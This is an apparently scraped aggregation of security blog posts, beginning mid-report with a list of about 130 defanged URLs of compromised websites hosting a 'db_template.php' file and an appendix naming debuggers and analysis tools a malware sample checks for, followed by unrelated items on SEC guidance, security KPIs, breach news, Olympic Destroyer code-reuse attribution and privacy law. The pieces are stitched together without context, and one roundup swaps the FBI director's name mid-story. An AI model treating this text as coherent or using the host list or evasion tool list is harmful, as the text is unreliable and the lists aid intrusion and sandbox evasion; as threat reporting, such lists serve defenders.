hxxp://aguasdecastilla[.]com/uploads/db_template.php
hxxp://www.arabgamenetwork[.]com//db_template.php
hxxps://arhiepiscopiabucurestilor[.]ro/templates/db_template.php
hxxp://amruthavana[.]com/blog/db_template.php
hxxp://digitalblue[.]co.za//db_template.php
hxxps://www.alvarezarquitectos[.]com//db_template.php
hxxp://buboobioinnovations[.]co.za/wpimages/db_template.php
hxxp://andrewsbisom[.]com//db_template.php
hxxp://www.m-3[.]co.za//db_template.php
hxxp://beesrenovations[.]co.za/images/db_template.php
hxxps://www.apliety[.]co.il/wp-includes/db_template.php
hxxp://alchamelup[.]org/htdocs/db_template.php
hxxp://benonicoc[.]co.za/resources/db_template.php
hxxps://al-mostakbl[.]com//db_template.php
hxxp://alchimiegrafiche[.]net/bbdelteatro/db_template.php
hxxp://andrespazsoldan[.]com//db_template.php
hxxp://in2accounting[.]co.za//db_template.php
hxxp://aipa[.]ca//db_template.php
hxxp://alphabee.fund/PHPMailer_5.2.0/db_template.php
hxxp://arabsdeals[.]com//db_template.php
hxxps://archiotronic[.]com/wp-includes/db_template.php
hxxp://capewindstrading[.]co.za//db_template.php
hxxps://althurayaa[.]com//db_template.php
hxxp://jhphotoedits[.]co.za//db_template.php
hxxp://cloudhub.co.ls/modules/db_template.php
hxxp://apironco[.]com/wp-includes/db_template.php
hxxp://digital-cameras-south-africa[.]co.za/script/db_template.php
hxxp://ahmadhasanat[.]com//db_template.php
hxxp://alexrocchi[.]com//db_template.php
hxxp://aljaadi[.]com//db_template.php
hxxps://www.engeltjieakademie[.]co.za//db_template.php
hxxp://annabelle[.]nl/next/db_template.php
hxxp://juniorad[.]co.za/vendor/db_template.php
hxxp://animationpulse[.]net//db_template.php
hxxp://angloglot[.]com//db_template.php
hxxp://agricolavicuna.cl//db_template.php
hxxp://alexelgy[.]com/allaccess/db_template.php
hxxp://www.centreforgovernance[.]uk//db_template.php
hxxp://www.aliandconsulting[.]com//db_template.php
hxxp://balaateen[.]co.za/less/db_template.php
hxxp://aleksicdunja[.]com//db_template.php
hxxp://arestihome[.]com//db_template.php
hxxp://am1int.fcomet[.]com/wp1/db_template.php
hxxp://anet-international-group[.]com/shop/db_template.php
hxxp://courtesydriving[.]co.za/js/db_template.php
hxxp://annaplebanek[.]com//db_template.php
hxxp://agencijazemil[.]com//db_template.php
hxxp://airminumtiro[.]com//db_template.php
hxxp://www.androidwikihow[.]com//db_template.php
hxxp://alisabyfinna[.]com//db_template.php
hxxp://rma-law[.]co.za//db_template.php
hxxp://amari[.]ro/components/db_template.php
hxxp://anxiousandunstoppable[.]com//db_template.php
hxxp://www.buhlebayoacademy[.]com//db_template.php
hxxp://arabellajo[.]com/wp/wp-includes/db_template.php
hxxp://blackthorn[.]co.za//db_template.php
hxxp://alaqaba[.]com/dnsarabia[.]com/db_template.php
hxxp://airesis.blog/wp-admin/db_template.php
hxxp://www.aptibet[.]org//db_template.php
hxxp://alecattic[.]com/wp-includes/db_template.php
hxxp://anglero[.]com//db_template.php
hxxp://getabletravel[.]co.za/wpscripts/db_template.php
hxxp://www.allwestdental[.]com/wp-includes/db_template.php
hxxp://printernet[.]co.za//db_template.php
hxxp://genesisbs[.]co.za//db_template.php
hxxp://allsporthealthandfitness[.]com//db_template.php
hxxp://www.humorcarbons[.]com//db_template.php
hxxp://intelligentprotection[.]co.za//db_template.php
hxxp://amazethings[.]com//db_template.php
hxxp://incoso[.]co.za/images/db_template.php
hxxp://www.antoanetapalikarska[.]com//db_template.php
hxxps://www.alteaparadise[.]com/wp-includes/db_template.php
hxxp://amirmenahem[.]com//db_template.php
hxxp://isound[.]co.za//db_template.php
hxxp://www.alestilorachel[.]com//db_template.php
hxxp://alcfm[.]net/wp-admin/db_template.php
hxxp://www.acer-parts[.]co.za//db_template.php
hxxp://www.gsmmid[.]com//db_template.php
hxxp://skhaleni[.]co.za//db_template.php
hxxps://amiici.vision//db_template.php
hxxps://andihaas[.]at/wp-includes/db_template.php
hxxp://www.albertaprimebeef[.]com//db_template.php
hxxps://www.appster[.]it/wp-includes/db_template.php
hxxp://amofoundation[.]org/wp-includes/db_template.php
hxxp://iqra[.]co.za/pub/db_template.php
hxxp://thecompasssolutions[.]co.za//db_template.php
hxxp://archwaycarpetscrm[.]co[.]uk//db_template.php
hxxp://iggleconsulting[.]com//db_template.php
hxxps://angel-blanco[.]net/wp-includes/db_template.php
hxxps://anotherdayinparadise[.]ca//db_template.php
hxxp://www.bitp[.]co.za//db_template.php
hxxp://cupboardcure[.]co.za/vendor/db_template.php
hxxp://all2wedding[.]com/wp-includes/db_template.php
hxxp://allianz[.]com.pe/wp-admin/db_template.php
hxxp://amiehepperlin[.]com//db_template.php
hxxps://www.amighini[.]it/webservice/db_template.php
hxxp://broken-arrow[.]co.za//db_template.php
hxxp://www.ihlosiqs-pm[.]co.za//db_template.php
hxxp://alisimple[.]si/wp-includes/db_template.php
hxxp://allthat[.]social//db_template.php
hxxp://www.amphibiblechurch[.]com//db_template.php
hxxp://bestencouragementwords[.]com//db_template.php
hxxp://alayhamtechnologies[.]com//db_template.php
hxxps://alaskanharvestseafood[.]com/backup/db_template.php
hxxps://www.air-mag[.]ro//db_template.php
hxxp://get-paid-for-online-survey[.]com//db_template.php
hxxp://www.antc[.]ch/wp-includes/db_template.php
hxxp://firstchoiceproperties[.]co.za//db_template.php
hxxp://habibtextiles[.]pk//db_template.php
hxxp://fsproperties[.]co.za/engine1/db_template.php
hxxp://diegemmerkat[.]co.za//db_template.php
hxxp://molepetravel.co.ls//db_template.php
hxxp://mmetl[.]co.za//db_template.php
hxxp://altrablog[.]com//db_template.php
hxxp://abrahamseed[.]co.za//db_template.php
hxxp://www.amerindgen[.]com/author/admin1/db_template.php
hxxp://altcoinaddict[.]com//db_template.php
hxxp://iiee.edu[.]pk//db_template.php
hxxp://cmhts[.]co.za/resources/db_template.php
hxxp://domesticguardians[.]co.za/Banner/db_template.php
hxxps://amishcountryfurnishings[.]com//db_template.php
hxxps://allday[.]gr//db_template.php
hxxp://www.alinn-u-yin[.]com//db_template.php
hxxps://www.allin-chain[.]com//db_template.php
hxxps://www.anatapackaging[.]com/vendors/db_template.php
hxxp://alexcelts[.]com/wp/db_template.php
hxxp://www.allstylus[.]com.br//db_template.php
hxxp://www.algom-law[.]com//db_template.php
hxxp://ambiances-toiles[.]fr//db_template.php
Appendix
Security Tools Checked on the Machine
win32_remote
win64_remote64
ollydbg
ProcessHacker
tcpview
autoruns
autorunsc
filemon
procmon
regmon
procexp
idaq
idaq64
ImmunityDebugger
Wireshark
dumpcap
HookExplorer
ImportREC
PETools
LordPE
dumpcap
SysInspector
proc_analyzer
sysAnalyzer
sniff_hit
windbg
joeboxcontrol
joeboxserver
Webinar Recording Available on SEC Cybersecurity Guidance
On March 7, 2018, Hunton & Williams LLP hosted a webinar with partners Lisa Sotto, Aaron Simpson and Scott Kimpel, and senior associate Brittany Bacon on the Securities and Exchange Commission’s (“SEC’s”) recently released cybersecurity guidance. For the first time since its last major staff pronouncement on cybersecurity in 2011, the SEC has released new interpretive guidance for public companies that will change the way issuers approach cybersecurity risk.
Sotto, Simpson, Kimpel and Bacon discussed this new guidance within the context of the current cyber threat landscape, including outlining changes in regulatory obligations under EU law with respect to the upcoming GDPR and historical SEC enforcement actions related to cybersecurity.
View a recording of the webinar.
Early Bird Gets The Worm – Application Security Weekly #08
This week, Paul and Keith talk about “The Phoenix Project”, Amazon admits Alexa is creepily laughing at people, Ethereum fixes serious ‘eclipse’ flaw, Kali Linux is now an app in the Windows App Store, Docker + Minecraft = Dockercraft, and more on this episode of Application Security Weekly!
Full Show Notes: https://wiki.securityweekly.com/ASW_Episode08
Visit https://www.securityweekly.com/asw for all the latest episodes!
Measure Security Performance, Not Policy Compliance – The Falcon’s View
I started my security (post-sysadmin) career heavily focused on security policy frameworks. It took me down many roads, but everything always came back to a few simple notions, such as that policies were a means of articulating security direction, that you had to prescriptively articulate desired behaviors, and that the more detail you could put into the guidance (such as in standards, baselines, and guidelines), the better off the organization would be. Except, of course, that in the real world nobody ever took time to read the more detailed documents, Ops and Dev teams really didn't like being told how to do their jobs, and, at the end of the day, I was frequently reminded that publishing a policy document didn't translate to implementation.
Subsequently, I've spent the past 10+ years thinking about better ways to tackle policies, eventually reaching the point where I believe "less is more" and that anything written and published in a place and format that isn't "work as usual" will rarely, if ever, get implemented without a lot of downward force applied. I've seen both good and bad policy frameworks within organizations. Often they cycle around between good and bad. Someone will build a nice policy framework, it'll get implemented in a number of key places, and then it will languish from neglect and inadequate upkeep until it's irrelevant and ignored. This is not a recipe for lasting success.
Thinking about it further this week, it occurred to me that part of the problem is thinking in the old "compliance" mindset. Policies are really to blame for driving us down the checkbox-compliance path. Sure, we can easily stand back and try to dictate rules, but without the adequate authority to enforce them, and without the resources needed to continually update them, they're doomed to obsolescence. Instead, we need to move to that "security as code" mentality and find ways to directly codify requirements in ways that are naturally adapted and maintained.
End Dusty Tomes and (most) Out-of-Band Guidance
The first daunting challenge of security policy framework reform is to throw away the old, broken approach with as much gusto and finality as possible. Yes, there will always be a need for certain formally documented policies, but overall an organization Does. Not. Need. large amounts of dusty tomes providing out-of-band guidance to a non-existent audience.
Now, note a couple things here. First, there is a time and a place for providing out-of-band guidance, such as via direct training programs. However, it should be the minority of guidance, and wherever possible you should seek to codify security requirements directly into systems, applications, and environments. For a significant subset of security practices, it turns out we do not need to repeatedly consider whether or not something should be done, but can instead make the decision once and then roll it out everywhere as necessary and appropriate.
Second, we have to realize and accept that traditional policy (and related) documents only serve a formal purpose, not a practical or pragmatic purpose. Essentially, the reason you put something into writing is because a) you're required to do so (such as by regulations), or b) you're driven to do so due to ongoing infractions or the inability to directly codify requirements (for example, requirements on human behavior). What this leaves you with are requirements that can be directly implemented and that are thus easily measurable.
KPIs as Policies (et al.)
If the old ways aren't working, then it's time to take a step back and think about why that might be and what might be better going forward. I'm convinced the answer to this query lies in stretching the "security as code" notion a step further by focusing on security performance metrics for everything and everyone instead of security policies. Specifically, if you think of policies as requirements, then you should be able to recast those as metrics and key performance indicators (KPIs) that are easily measured, and in turn are easily integrated into dashboards. Moreover, going down this path takes us into a much healthier sense of quantitative reasoning, which can pay dividends for improved information risk awareness, measurement, and management.
Applied, this approach scales very nicely across the organization. Businesses already operate on a KPI model, and converting security requirements (née policies) into specific measurables at various levels of the organization means ditching the ineffective, out-of-band approach previously favored for directly specifying, measuring, and achieving desired performance objectives. Simply put, we no longer have to go out of our way to argue for people to conform to policies, but instead simply start measuring their performance and incentivize them to improve to meet performance objectives. It's then a short step to integrating security KPIs into all roles, even going so far as to establish departmental, if not whole-business, security performance objectives that are then factored into overall performance evaluations.
Examples of security policies-become-KPIs might include metrics around vulnerability and patch management, code defect reduction and remediation, and possibly even phishing-related metrics that are rolled up to the department or enterprise level. When creating security KPIs, think about the policy requirements as they're written and take time to truly understand the objectives they're trying to achieve. Convert those objectives into measurable items, and there you are on the path to KPIs as policies. For more on thoughts on security metrics, I recommend checking out the CIS Benchmarks as a starting point.
Better Reporting and the Path to Accountability
Converting policies into KPIs means that nearly everything is natively built for reporting, which in turn enables executives to have better insight into the security and information risk of the organization. Moreover, shifting the focus to specific measurables means that we get away from the out-of-band dusty tomes, instead moving toward achieving actual results. We can now look at how different teams, projects, applications, platforms, etc., are performing and make better-informed decisions about where to focus investments for improvements.
This notion also potentially sparks an interesting future for current GRC-ish products. If policies go away (mostly), then we don't really need repositories for them. Instead, GRC products can shift to being true performance monitoring dashboards, allowing those products to broaden their scope while continuing to adapt other capabilities, such as those related to the so-called "SOAR" market (Security Orchestration, Automation, and Response). If GRC products are to survive, I suspect it will be by either heading further down the information risk management path, pulling in security KPIs in lieu of traditional policies and compliance, or it will drive more toward SOAR+dashboards with a more tactical performance focus (or some combination of the two). Suffice to say, I think GRC as it was once known and defined is in its final days of usefulness.
There's one other potentially interesting tie-in here, and that's to overall data analytics, which I've noticed slowly creeping into organizations. A lot of the focus has been on using data lakes, mining, and analytics in lieu of traditional SIEM and log management, but I think there's also a potentially interesting confluence with security KPIs, too. In fact, thinking about pulling in SOAR capabilities and other monitoring and assessment capabilities and data, it's not unreasonable to think that KPIs become the tweakable dials CISOs (and up) use to balance out risk vs reward in helping provide strategic guidance for address information risk within the enterprise. At any rate, this is all very speculative and unclear right now, but something to nonetheless watch. But I have digressed...
---
The bottom line here is this: traditional policy frameworks have generally outlived their usefulness. We cannot afford to continue writing and publishing security requirements in a format that isn't easily accessible in a "work as usual" format. In an Agile/DevOps world, "security as code" is imperative, and that includes converting security requirements into KPIs.
Warning as Mac malware exploits climb 270%
Reputable anti-malware security vendor Malwarebytes is warning Mac users that malware attacks against the platform climbed 270 percent last year.
Be careful out there
The security experts also warn that four new malware exploits targeting Macs have been identified in the first two months of 2018, noting that many of these exploits were identified by users, rather than security firms.
In one instance, a Mac user discovered that their DNS settings had been changed and found themselves unable to change them back.
Weekly Cyber Risk Roundup: Payment Card Breaches, Encryption Debate, and Breach Notification Laws
This past week saw the announcement of several new payment card breaches, including a point-of-sale breach at Applebee’s restaurants that affected 167 locations across 15 states.
The malware, which was discovered on February 13, 2018, was “designed to capture payment card information and may have affected a limited number of purchases” made at Applebee’s locations owned by RMH Franchise Holdings, the company said in a statement.
News outlets reported many of the affected locations had their systems infected between early December 2017 and early January 2018. Applebee’s has close to 2,000 locations around the world and 167 of them were affected by the incident.
In addition to Applebees, MenuDrive issued a breach notification to merchants saying that its desktop ordering site was injected with malware designed to capture payment card information. The incident impacted certain transactions from November 5, 2017 to November 28, 2017.
“We have learned that the malware was contained to ONLY the Desktop ordering site of the version that you are using and certain payment gateways,” the company wrote. “Thus, this incident was contained to a part of our system and did NOT impact the Mobile ordering site or any other MenuDrive versions.”
Finally, there is yet another breach notification related to Sabre Hospitality Solutions’ SynXis Central Reservations System — this time affecting Preferred Hotels & Resorts. Sabre said that a unauthorized individual used compromised user credentials to view reservation information, including payment card information, for a subset of hotel reservations that Sabre processed on behalf of the company between June 2016 and November 2017.
Other trending cybercrime events from the week include:
- Marijuana businesses targeted: MJ Freeway Business Solutions, which provides business management software to cannabis dispensaries, is notifying customers of unauthorized access to its systems that may have led to personal information being stolen. The Canadian medical marijuana delivery service JJ Meds said that it received an extortion threat demanding $1,000 in bitcoin in order to prevent a leak of customer information.
- Healthcare breach notifications: The Kansas Department for Aging and Disability Services said that the personal information of 11,000 people was improperly emailed to local contractors by a now-fired employee. Front Range Dermatology Associates announced a breach related to a now-fired employee providing patient information to a former employee. Investigators said two Florida Hospital employees stole patient records, and local news reported that 9,000 individuals may have been impacted by the theft.
- Notable data breaches: Ventiv Technology, which provides workers’ compensation claim management software solutions, is notifying customers of a compromise of employee email accounts that were hosted on Office365 and contained personal information. Catawba County services employees had their personal information compromised due to the payroll and human resources system being infected with malware. Flexible Benefit Service Corporation said that an employee email account was compromised and used to search for wire payment information. A flaw in Nike’s website allowed attackers to read server data and could have been leveraged to gain greater access to the company’s systems. A researcher claimed that airline Emirates is leaking customer data.
- Other notable events: Cary E. Williams CPA is notifying employees, shareholders, trustees and partners of a ransomware attack that led to unauthorized access to its systems. The cryptocurrency exchange Binance said that its users were the target of “a large scale phishing and stealing attempt” and those compromised accounts were used to perform abnormal trading activity over a short period of time. The spyware company Retina-X Studios said that it “is immediately and indefinitely halting its PhoneSheriff, TeenShield, SniperSpy and Mobile Spy products” after being “the victim of sophisticated and repeated illegal hackings.”
SurfWatch Labs collected data on many different companies tied to cybercrime over the past week. Some of the top trending targets are shown in the chart below.
Cyber Risk Trends From the Past Week
There were several regulatory stories that made headlines this week, including the FBI’s continued push for a stronger partnership with the private sector when it comes to encryption, allegations that Geek Squad techs act as FBI spies, and new data breach notification laws.
In a keynote address at Boston College’s cybersecurity summit, FBI Director Christopher Wray said that there were 7,775 devices that the FBI could not access due to encryption in fiscal 2017, despite having approval from a judge. According to Fry, that meant the FBI could not access more than half of the devices they tried to access during the period.
“Let me be clear: the FBI supports information security measures, including strong encryption,” Fry said. “Actually, the FBI is on the front line fighting cyber crime and economic espionage. But information security programs need to be thoughtfully designed so they don’t undermine the lawful tools we need to keep the American people safe.”
However, Ars Technica noted that a consensus of technical experts has said that what the FBI has asked for is impossible.
In addition, the Electronic Frontier Foundation obtained documents via a Freedom of Information Act lawsuit that revealed the FBI and Best Buy’s Geek Squad have been working together for decades. In some cases Geek Squad techs were paid as much as $1,000 to be informants, which the EFF argued was a violation of Fourth Amendment rights as the computer searches were not authorized by their owners.
Finally, the Alabama senate unanimously passed the Alabama Breach Notification Act, and the bill will now move to the house.
“Alabama is one of two states that doesn’t have a data breach notification law,” said state Senator Arthur Orr, who sponsored Alabama’s bill. “In the case of a breach, businesses and organizations, including state government, are under no obligation to tell a person their information may have been compromised.”
With both Alabama and South Dakota recently introducing data breach notification legislation, every resident of the U.S. may soon be protected by a state breach notification law.
Security is not a buzz-word business model, but our cumulative effort

This article conveys my personal opinion towards security and it's underlying revenue model; I would recommend to read it with a pinch of salt (+ tequila, while we are on it). I shall be covering either side of the coin, the heads where pentesters try to give you a heads-up on underlying issues, and tails where the businesses still think they can address security at the tail-end of their development.
A recent conversation with a friend who's in information security triggered me to address the white elephant in the room. He works in a security services firm that provides intelligence feeds and alerts to the clients. Now he shared a case where his firm didn't share the right feed at the right time even though the client was "vulnerable" because the subscription model is different. I understand business is essential, but on the contrary isn't security a collective argument? I mean tomorrow if when this client gets attacked, are you going just to turn a blind eye because it didn't pay you well? I understand the remediation always cost money (or more efforts) but holding the alert to a client on some attack you witnessed in the wild based on how much money are they paying you is hard to contend.
I don't dream about the utopian world where security is obvious but we surely can walk in that direction.
What is security to a business?
Is it a domain, a pillar or with the buzz these days, insurance? Information security and privacy while being the talk of the town are still come where the business requirements end. I understand there is a paradigm shift to the left, a movement towards the inception for your "bright idea" but still we are far from an ideal world, the utopian so to speak! I have experienced from either side of the table - the one where we put ourselves in the shoes of hackers and the contrary where we hold hands with the developers to understand their pain points & work together to build a secure ecosystem. I would say it's been very few times that business pays attention to "security" from day-zero (yeah, this tells the kind of clients I am dealing with and why are in business). Often business owners say - Develop this application, based on these requirements, discuss the revenue model, maintenance costs, and yeah! Check if we need these security add-ons or do we adhere to compliance checks as no one wants auditors knocking at the door for all the wrong reasons.
This troubles me. Why don't we understand information security as important a pillar as your whole revenue model?
How is security as a business?
I have many issues with how "security" is being tossed around as a buzz-word to earn dollars, but very few respect the gravity or the very objective of its existence. I mean whether it's information, financial, or life security - they all have very realistic and quantifiable effects on someone's physical well-being. Every month, I see tens (if not hundreds) of reports and advisories where quality is embarrassingly bad. When you tap to find the right reasons - either the "good" firms are costly, or someone has a comfort zone with existing firms, or worst that neither the business care nor do they pressure firms for better quality. I mean at the end, it's a just plain & straightforward business transaction or a compliance check to make auditor happy.
Have you ever asked yourself the questions,
- You did a pentest justifying the money paid for your quality; tomorrow that hospital gets hacked, or patients die. Would you say you didn't put your best consultants/efforts because they were expensive for the cause? You didn't walk the extra mile because the budgeted hours finished?
- Now, to you Mr Business, CEO - You want to cut costs on security because you would prefer a more prominent advertisement or a better car in your garage, but security expenditure is dubious to you. Next time check how much companies and business have lost after getting breached. I mean just because it's not an urgent problem, doesn't say it can't be. If it becomes a problem, chances are it's too late. These issues are like symptoms; if you see them, you already are in trouble! Security doesn't always have an immediate ROI, I understand, but don't make it an epitome of "out of sight, out of mind". That's a significant risk you are taking on your revenue, employees or customers.
Now, while I have touched both sides of the problem in this short article; I hope you got the message (fingers crossed). Please do take security seriously, and not only as your business transaction! Every time you do something that involves security on either sides, think - You invest your next big crypto-currency in an exchange/ market that gets hacked because of their lack of due-diligence? Or, your medical records became public because someone didn't perform a good pen-test. Or, you lose your savings because your bank didn't do a thorough "security" check of its infrastructure. If you think you are untouchable because of your home router security; you, my friend are living in an illusion. And, my final rant to the firms where there are good consultants but the reporting, or seriousness in delivering the message to the business is so fcuking messed up, that all their efforts go in vain. Take your deliverable seriously; it's the only window business has to peep into the issues (existing or foreseen), and plan the remediation in time.
That's all my friends. Stay safe and be responsible; security is a cumulative effort and everyone has to be vigilant because you never know where the next cyber-attack be.
Happy Anniversary – Paul’s Security Weekly #550
This week, Stefano Righi of UEFI joins us for an interview! Sven Morgenroth, Security Researcher at Netsparker joins us for the Technical Segment! In the news, we have updates from FinFisher, Equifax, Facebook, and more on this episode of Paul's Security Weekly!
Full Show Notes: https://wiki.securityweekly.com/Episode550
Visit https://www.securityweekly.com/psw for all the latest episodes!
From Russia(?) with Code
The Olympic Destroyer cyberattack is a very recent and notable attack by sophisticated threat actors against a globally renowned 2-week sporting event that takes place once every four years in a different part of the world. Successfully attacking the Winter Olympics requires motivation, planning, resources and time.
Cyberattack campaigns are often a reflection of real world tensions and provide insight into the possible suspects in the attack. Much has been written about the perpetrators behind Olympic Destroyer emanating from either North Korea or Russia. Both have motivations. North Korea would like to embarrass its sibling South Korea, the holders of the 23rd Winter Olympics. Russia could be seeking revenge for the IOC ban on their team. And Russia has precedence, having previously been blamed for attacks on other sporting organizations, such as the intrusion at the World Anti Doping Agency that was targeted via a stolen International Olympic Committee account.
There has been much said about attribution, with accusations of misleading false flags and anti-forensics built into the malware. As Talos points out in their report, attribution is hard.
But attribution is not just hard, it’s often a wilderness of mirrors and, more often than not, a bit anticlimactic.
The motivation of our following analysis is not to point the finger of blame about who did the attacking, but to utilize our expertise in analyzing malware code and understanding the behaviors it exhibits to highlight the heritage, evolution and commonalities we found in the code of the Olympic Destroyer malware.
Initial Samples of Code Reuse
Besides analyzing the behavior of a sample, our sandbox performs several levels of code analysis, eventually extracting all code components, regardless if they are run at run-time or not. As we described in a blog post a few years ago, this technique is essential if we are to detect any dormant functionality that might be present within the sample.
After decomposing the code components in normalized basic blocks, the sandbox computes smart code hashes that are stored and indexed in our threat intelligence knowledge base. Over the last 3 years we have been collecting code hashes for millions of files, so when we want to hunt for other samples related to the same actor, we are able to query our backend for any other binaries that have been reusing significant amounts of code.
The rationale being that actors usually build up their code base over time, and reuse it over and over again across different campaigns. Code surely might evolve, but some components are bound to remain the same. This is the intuition that drove our investigation on Olympic Destroyer further. The first results were obviously some variants of the Olympic Destroyer binaries which we have already mentioned in our previous post. However, it quickly got way more interesting.
A very specific code hash led us through this process: 7CE26E95118044757D3C7A97CF9D240A (Lastline customers can use it to query our Global Threat Intelligence Network). This rare code hash surprisingly linked 21ca710ed3bc536bd5394f0bff6d6140809156cf, a payload of the Olympic Destroyer campaign, with some other samples of a remote access trojan, “TVSpy.” Though the actual internal name of the threat is TVRAT, the malware is known and labelled in VirusTotal as Trojan.Pavica or Trojan.Mezzo, none of which were previously connected to the original Olympic Destroyer campaign.
Figure 1 shows the actual code referenced by the code hash: it is a function used to read a buffer, and subsequently parse PE header from it.

Figure 1: The code referenced by the code hash 7CE26E95118044757D3C7A97CF9D240A shared by both the Olympic Destroyer sample 21ca710ed3bc536bd5394f0bff6d6140809156cf sha1 and TVSpy sample a61b8258e080857adc2d7da3bd78871f88edec2c.
This is not where code re-usage ends, as the actual function referencing and invoking the following fragment (see Figure 2) also shares almost all of the same logic. This function is responsible for loading PE file from the memory buffer and executing an entry point.

Figure 2: Function responsible for loading PE file from memory reused in both Olympic Destroyer and TV Spy
A Deeper Dive Based on Unusual Code
We decided to further investigate this piece of code since loading PE from memory is not all that common. Its origin opened several questions:
- Why is that piece of code the only link between the two samples?
- Were there any other samples sharing the same code?
Our first discovery was a Remote Access trojan called TVSpy, mentioned above. This family has been the subject of a few previous research investigations, and a recent Benkow Lab blog post (from November 2017) even reported that the source code was available on github.
Unfortunately, all links to github are now dead. But that didn’t stop us from finding the actual source code (or at least evidence that it was indeed published at some point). Apparently it was sold for $US500 on an underground Russian forum in 2015. Even though the original post and links are gone, a Russian information security forum kept a copy of the source code package alongside a description of the original sale announcement (see Figure 3).

Figure 3: TVSpy code as sold in an underground forum (according to researchers from ru-sfera.org)
Not Enough – The Investigation Continued
Although interesting, this connection was eventually not enough to connect Olympic Destroyer to Russia or to TVSpy. So we kept digging. Further research finally identified the code in Figures 1 and 2 to be part of an open source project called LoadDLL (see Figure 4) and available on codeproject.com (first published back in March 2014).

Figure 4: Fragment of LoadDLL source code from LoadDLL project
However, a couple things still didn’t add up: why had we only managed to identify samples from 2017 even if the source code was released in 2014? What about older versions of TVSpy? How come our search didn’t return any of those samples? Were Olympic Destroyer and TVSpy samples from 2017 sharing more than just the LoadDLL code?
Apparently TVSpy went through a few transformations. Samples from 2015 did embed and use the LoadDLL code, but the compiler did some specific optimizations that made the code unique (see Figure 5). In particular the compiler optimized out both “flags” (not used in the function) and “read_proc” (statically link function) from the parameters of LoadDll, but it couldn’t optimize out a “if (read_proc)” check even though it is useless since “read_proc” is not passed as a parameter anymore.

Figure 5. Reconstructed source code of LoadDll from TVSpy dated back to 2015
The “read_proc” function itself is also identical to one from source code (see Figures 6 and 7) and as you can see in Figure 8, it also gets called exactly the same way as the original source code from codeproject.com.

Figure 6: read_proc function implementation

Figure 7: read_proc function implementation
The most interesting aspect for us is in fact the version of TVSpy that dates back to 2017-2018 and shares with Olympic Destroyer almost the exact binary code of LoadDLL. You can see LoadDll_LoadHeaders for those samples in Figure 9: as you might notice the function looks different then the one from the older version (see Figure 8).

Figure 8. Reconstructed source code of LoadDLL_LoadHeaders function from TVSpy dated back to 2015
First, we thought that the authors added new checks before calling read_proc function, making clear link between Olympic Destroyer and TVSpy (how, after all, could there be the same code modifications if the authors were not the same?). However, after further review we figured that read_proc didn’t exist anymore. Instead it was compiled inline resulting in a statically linked memcpy function.

Figure 9. Reconstructed LoadDLL_LoadHeaders from TVSpy and OlympicDestroyer samples, including additional check due to inlining of the read_proc function.
Also the meaningless check in LoadDll (“if (read_proc)”) we mentioned before has disappeared in the new version of the code (see Figure 10).

Figure 10. Reconstructed LoadDLL_LoadHeaders from TVSpy and Olympic Destroyer samples, including additional check due to inlining of the read_proc function.
The Bottom Line – Evidence is Inconclusive
In conclusion, we believe that this is not enough evidence to substantiate a claim that Olympic Destroyer and new versions of TVSpy using the same modified source code are built by the same author.
The more probable version for us is that the sample was built on a new compiler that further optimized the code. It would still mean that both new version of TVSpy and Olympic Destroyer are built using the same toolchain configured in the very same way (to enable full optimization and link C++ runtime statically). We actually went to the extent of compiling the LoadDLL on MS Visual Studio 2017 with C++ runtime statically linked, and we managed to get the very same code as the one included in both Olympic Destroyer and TVSpy.
Although we would have liked to finally solve the dilemma, and unveil which were the actors behind the Olympic Destroyer attack, we ended up with more questions than answers, but admittedly, that’s what research sometimes is about.
First, why would the authors of an allegedly state sponsored malware use an old LoadDLL project from an open source project from 2014? It is hard to believe that they could not come up with their own implementation or use much more advanced open-source projects for that, and definitely not relying on an educational prototype buried way beyond the first page of results in Google.
Or maybe the actors were not that much advanced as we would like to think, maybe seeing this as a one-time job, without enough resources to avoid using publicly available source code to quickly build their malware? Or maybe it’s just another red flag, and the real authors decided to use the TVSpy source code as released in 2015 to leave a “Russian fingerprint”?
Maybe all of the above?
At the beginning of this article we stated that attribution is not just hard, it’s often a wilderness of mirrors and more often than not, a bit anticlimactic. As a matter of fact, that was quite a precise prediction.
The post From Russia(?) with Code appeared first on Lastline.
"Faster payment" scam is not quite what it seems
Singapore Joins the APEC CBPR and PRP Systems
On March 6, 2018, Singapore’s Ministry of Communications and Information announced that Singapore has joined the APEC Cross-Border Privacy Rules (“CBPR”) and Privacy Recognition for Processors (“PRP”) systems. As we previously reported, Singapore submitted its intent to join both systems in July 2017.
Singapore becomes the sixth APEC economy to join the CBPR system, joining the U.S., Mexico, Canada, Japan and South Korea, and the second APEC economy to join the PRP system, after the U.S. The decision to join will mean that once the CBPR are fully operationalized in Singapore, through a local Accountability Agent that will certify companies, Singapore-based organizations will be able certify to the CBPR and rely on them as a cross-border data transfer mechanism. Other APEC economies actively working on joining the CBPR and PRP systems include Australia, Chinese Taipei and the Philippines.
The APEC CBPR system is a regional, multilateral cross-border data transfer mechanism and an enforceable privacy code of conduct developed for businesses by the 21 APEC member economies. The CBPR system implements the nine high-level APEC Privacy Principles set forth in the APEC Privacy Framework.
As we previously reported, the APEC PRP system allows information processors to demonstrate their ability to effectively implement an information controller’s privacy obligations related to the processing of personal information. The PRP also enables information controllers to identify qualified and accountable processors, as well as to assist small- or medium-sized processors that are not widely known to gain visibility and credibility.
CIPL Issues White Paper on GDPR Implementation in Respect of Children’s Data and Consent
On March 6, 2018, the Centre for Information Policy Leadership (“CIPL”) at Hunton & Williams LLP issued a white paper on GDPR Implementation in Respect of Children’s Data and Consent (the “White Paper”). The White Paper sets forth guidance and recommendations concerning the application of GDPR requirements to the processing of children’s personal data. The White Paper also highlights and addresses several issues raised by the Article 29 Working Party (the “Working Party”) with regard to children in its guidelines on consent and issues raised by the UK Information Commissioner’s Office in its Consultation on Children and the GDPR.
Key points of focus in the White Paper include:
- Emphasizing that while Article 8 of the GDPR imposes specific conditions to a child’s consent in certain circumstances, other legal processing bases are still applicable and sometimes more appropriate to the processing of children’s data;
- Presenting a risk-based test to determine whether an information society service is offered directly to a child and how this could be developed within the framework of the GDPR;
- Considering the application of GDPR provisions to children’s data outside the realm of Article 8, for example, requirements on transparency, the exercise of individual rights and marketing;
- Highlighting the importance of a consistent approach to implementing national age thresholds and the potential challenges that arise from a fragmented approach; and
- Underlining the difficulties that organizations may face post-GDPR with regard to the continuation of services to children who previously consented to processing, which now falls within the scope of Article 8 of the GDPR.
To read CIPL’s position on the points above, in addition to its other recommendations, please view the full White Paper.
The White Paper was developed in the context of CIPL’s ongoing GDPR Implementation Project, a multi-year initiative involving research, workshops, webinars and white papers, supported by over 90 private sector organizations.
Master in Wi-Fi Ethical Hacking
[[ This is a content summary only. Visit my website for full links, other content, and more! ]]
